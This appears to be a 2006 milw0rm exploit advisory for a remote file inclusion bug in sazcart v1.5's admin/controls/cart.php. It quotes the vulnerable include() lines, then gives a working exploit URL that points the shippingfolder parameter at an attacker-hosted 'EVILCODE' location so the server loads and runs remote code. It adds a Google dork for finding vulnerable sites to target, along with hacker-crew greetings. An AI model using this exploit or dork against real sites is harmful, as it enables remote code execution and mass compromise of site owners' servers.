sazcart v1.5 (cart.php) Remote File include *********************---Hitamputih crew---******************************** * Bug Found By : IbnuSina * vendor : http://sazcart.com/site *Risk : High * Greetz : *Solpot,permenhack,barbarosa,cah|gemblunkz,fung_men,setiawan,irvian,meteoroid * and all member hitamputih crew community www.kaipank.org/forum *especially thx to str0ke@milw0rm.com *************************************************************************** bug found on admin/controls/cart.php include($_saz['settings']['shippingfolder'] . "/shipping.php"); $Shipping = new Shipping; include($_saz['settings']['taxfolder'] . "/tax.php"); $Tax = new Tax; exploit : http://sitename.com/[sazcart PATH]/admin/controls/cart.php?_saz[settings][shippingfolder]=HTTP://EVILCODE? google dork: "powered by sazcart" # milw0rm.com [2006-11-04]